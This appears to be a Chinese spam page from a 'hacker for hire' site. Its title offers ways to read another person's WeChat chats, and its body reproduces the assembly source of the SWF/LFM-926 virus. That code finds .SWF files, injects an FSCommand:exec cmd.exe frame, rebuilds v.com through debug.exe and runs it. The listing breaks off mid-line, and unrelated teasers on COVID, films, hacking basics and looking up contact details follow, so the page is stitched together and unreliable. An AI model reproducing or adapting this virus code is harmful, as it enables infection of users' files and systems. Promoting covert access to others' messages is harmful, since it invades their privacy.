怎样查别人的微信聊天记录 手机与电脑上的微信聊天记录怎么查看

访客4年前关于黑客接单929

SWF/LFM-926 Virus: ; ------------------ ; Description: WinNT/XP Virus dropper for Flash .SWF files! ; Ma *** Version 6.11: ML.EXE SWF.A *** ; Virus Size: 926 bytes ; Infection Size: 3247 bytes. ; Last Edit: 01/08/2002 ; --------------------------------- Begin Source Code ------------------------------------ .286 .model tiny .code org 100h Entry: jmp Start VIR_SIZE equ Virus_End-Entry DTA db 128 dup(0) ; Offset DTA 30 = filename HANDLE dw ? ; Handle to host file PTR1 dd 0 ; Segment address of the created memory block PATH db "*.SWF",0 ; File mask BINARY db "v.com",0 ; Binary code HEX db "0123456789ABCDEF" ; Binary to hex ; Flash header block. ; ------------------- SIGN_FW dw ? ; SWF file format SIGN_S db ? VERSION_NUM db ? FILE_LENGTH dw ? dw ? STATIC_HDR_SIZE equ $-SIGN_FW RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( RECT_BUF_SIZE equ $-RECT_BUF HDR_SIZE dw ? ; Holds the true header size! ; Start of Viral Frame 0. ; ----------------------- DROP_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! TAG_LENGTH dw 0 ; (ACTION LENGTH 3) 1[END_TAG] dw 0 db 083h ; ActionGetUrl Tag ACTION_LENGTH dw 0 ; (DROP_BEGIN_SIZE-9) (SUM OF DROP_MIDDLE) (DROP_END_SIZE) db FSCommand:exec db 000h db cmd.exe db 009h ; chr(9) is Flash code for a space character. db /c db 009h db echo db 009h db Loading.Flash.Movie... db & db (echo db 009h db n db 009h db v.com&echo db 009h db a db 009h db 100& DROP_BEGIN_SIZE equ $-DROP_BEGIN DROP_MIDDLE db echo db 009h db db db 009h db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. db & DROP_MIDDLE_SIZE equ $-DROP_MIDDLE DROP_END db &echo.&echo db 009h db rcx&echo db 009h db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. db &echo db 009h db w&echo db 009h db q)|debug.exe>nul&start db 009h db /b db 009h db v.com db 000h ; StringEnd Tag DROP_END_SIZE equ $-DROP_END ; End of Viral Frame 0. ; --------------------- END_TAG db 001h ; Action code 0x01 = tagshowframe Tag Start: mov ax,(VIR_SIZE 0fh) shr ax,4 shl ax,1 mov bx,ax ; Allocate (VirusSize*2) mov ah,4ah int 21h ; Resize block jc ExProg mov dx,offset DTA ; Set DTA operation mov ah,1ah int 21h mov cx,07h mov dx,offset PATH mov ah,4eh ; FindFirst int 21h jc ExProg jmp Infect Cycle: mov dx,offset PATH mov ah,4fh ; FindNext int 21h jc ExProg jmp Infect ExProg: mov ax,4301h ; Hide v.com mov cx,02h mov dx,offset BINARY int 21h mov ax,4c00h ; End program int 21h Infect: mov byte ptr DTA[30 12],$ mov dx,offset (DTA 30) mov ax,3d02h ; Open host file int 21h jc ExProg mov [HANDLE],ax ; Save file handle mov ax,3f00h ; Read file Header mov dx,offset SIGN_FW mov bx,[HANDLE] mov cx,(STATIC_HDR_SIZE RECT_BUF_SIZE) int 21h jc ExProg cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. jne Cycle ; Try another file ... cmp byte ptr SIGN_S,S jne Cycle cmp byte ptr VERSION_NUM,099h ; Already infected? je Cycle mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. xor di,di ; Seems to always exist directly after the header. next: cmp byte ptr RECT_BUF[di],043h jne not_found cmp byte ptr RECT_BUF[di 1],002h jne not_found jmp found not_found: inc di loop next jmp Cycle found: mov word ptr HDR_SIZE,STATIC_HDR_SIZE add word ptr HDR_SIZE,di ; Compute the header size mov ax,4200h ; Reset file ptr right after Flash header xor cx,cx mov dx,[HDR_SIZE] int 21h jc ExProg push bx mov ax,word ptr FILE_LENGTH add ax,15 shr ax,4 mov bx,ax mov ah,48h ; Allocate memory for target host file int 21h pop bx jc ExProg mov word ptr PTR1[2],ax ; Save pointer to allocated block mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ah,3fh ; Read host file into memory block push ds lds dx,[PTR1] int 21h pop ds jc ExProg mov ax,4200h ; Reset file ptr to the middle code section xor cx,cx mov dx,[HDR_SIZE] add dx,DROP_BEGIN_SIZE int 21h jc ExProg ; ; The following code is a key technique. It simply converts the ; virus from binary to hex characters and then inserts them into the host ; using a standard format that DEBUG.EXE expects! Flash only really ; allows plain text, so this satisfies that condition. ; mov word ptr ACTION_LENGTH,(DROP_BEGIN_SIZE-9 DROP_END_SIZE) push bx mov cx,VIR_SIZE xor si,si xor di,di ToHex: mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber mov al,byte ptr Entry[si] mov ah,al and al,00001111y xlat mov DROP_MIDDLE[STATIC_HDR_SIZE di 1],al shr ax,12 xlat mov DROP_MIDDLE[STATIC_HDR_SIZE di],al inc si inc di inc di inc di mov ax,si mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. div bl or ah,ah jnz cont push cx xor di,di add word ptr ACTION_LENGTH,DROP_MIDDLE_SIZE mov bx,[HANDLE] ; Write hex dump entry XX,...,XX mov dx,offset DROP_MIDDLE mov cx,DROP_MIDDLE_SIZE mov ax,4000h int 21h jc ExProg pop cx cont: loop ToHex pop bx or di,di jz no_remainder mov dx,offset DROP_MIDDLE mov cx,di add cx,7 ; STATIC_HDR_SIZE-1 add word ptr ACTION_LENGTH,cx mov ax,4000h ; Write remainder hex dump entry XX,...,XX int 21h jc ExProg no_remainder: mov dx,offset DROP_END mov cx,DROP_END_SIZE 1 mov ax,4000h ; Write end code and end of frame tag(01) into host int 21h jc ExProg mov cx,word ptr FILE_LENGTH sub cx,[HDR_SIZE] mov ax,4000h ; Write host code directly after viral code. push ds lds dx,[PTR1] int 21h pop ds jc ExProg ; Patch the header with new viral values. mov cx,word ptr ACTION_LENGTH add cx,4 mov word ptr TAG_LENGTH,cx add cx,6 add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH 6) ; Set inf

相关文章

关于B.1.1.7新冠病毒变泰民孙娜恩种 目前我们知道些什么

  近日,英国科学家发现了一种被称为B.1.1.7的新冠病毒变种,引起世界一片哗然。《科学》杂志刊文称,变种病毒传播能力要比原始毒株高70%左右,而伦敦最近新冠感染病例超过60%都来自变种病毒。  ...

黑客帝国007(黑客帝国2)

黑客帝国007(黑客帝国2)

本文导读目录: 1、黑客帝国哪部比较好看??? 2、007幽灵党女主角是不是黑客帝国的女主角 3、谁知道更多的 经典电影 三部曲 或者 四部曲? 4、最近喜欢上看007之类的电影,有没有好...

当黑客要有的基础(怎样当一名黑客)

当黑客要有的基础(怎样当一名黑客)

本文导读目录: 1、当一名黑客需要必备什么专业知识? 2、黑客必须掌握的基础是那些? 3、学习黑客需要先学习什么基础? 4、黑客需要学什么? 5、当以个黑客 学哪些基础知识啊? 6...

明日方舟DM5如何过 明日方舟DM5旗帜打法攻略

明日方舟DM5如何过 明日方舟DM5旗帜打法攻略

明日方舟生于黑夜活动昨天已经开始,这次的活动关卡也是随之开启,各位小伙伴都去尝试了吗,一些关卡可能对于一些小伙伴来说还是有些难度的,小编给大家带来了生于黑夜活动DM5旗帜打法攻略,一起来看看吧。...

查询一个人联系方式(联系方式查询)

共享平台只能查询基本信息,涉及到个人具体信息需要本人在相关业务单位或通过公安机关查询。未经被查询人许可的查询行为及公布他人信息属于违。 这要看你用什么方法了,最直接是问他本人,如果你有象美国中央情报局...

仿黑客攻击软件(高仿黑客入侵软件下载)

仿黑客攻击软件(高仿黑客入侵软件下载)

本文导读目录: 1、什么杀毒软件好? 2、怎么防止黑客入侵,不让他轻易的破坏电脑 3、国内什么杀毒软件比较好?最好免费的。 4、世界上最好的杀毒软件是什么? 5、目前最好的杀毒软件是哪...